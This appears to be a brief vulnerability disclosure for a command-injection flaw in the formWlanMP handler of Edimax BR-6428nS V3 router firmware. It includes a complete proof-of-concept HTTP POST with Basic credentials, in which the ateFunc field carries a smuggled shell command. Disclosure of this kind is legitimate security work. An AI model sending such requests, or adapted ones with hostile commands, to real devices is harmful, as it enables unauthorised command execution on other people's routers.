Edimax wireless_routers_n300 Command Injection
BR-6428nS V3 Firmware
Firmware Version: BR6428NSv3_1.20
You can download Firmware at this website and use FirmAE to simulate the router environment.
Description
There is a command injection in formWlanMP Function of binary file webs.


PS
You must pass basic verification before you can exploit this vulnerability
can find the user/passwd in website

POC
POST /goform/formWlanMP HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.2.1
Authorization: Basic YWRtaW46MTIzNA==
Connection: close
Referer: http://192.168.2.1/status.asp
Cookie: language=14
Upgrade-Insecure-Requests: 1
ateFunc=1;touch%20/tmp/Swe3ty&submit-url=%2Findex.asp


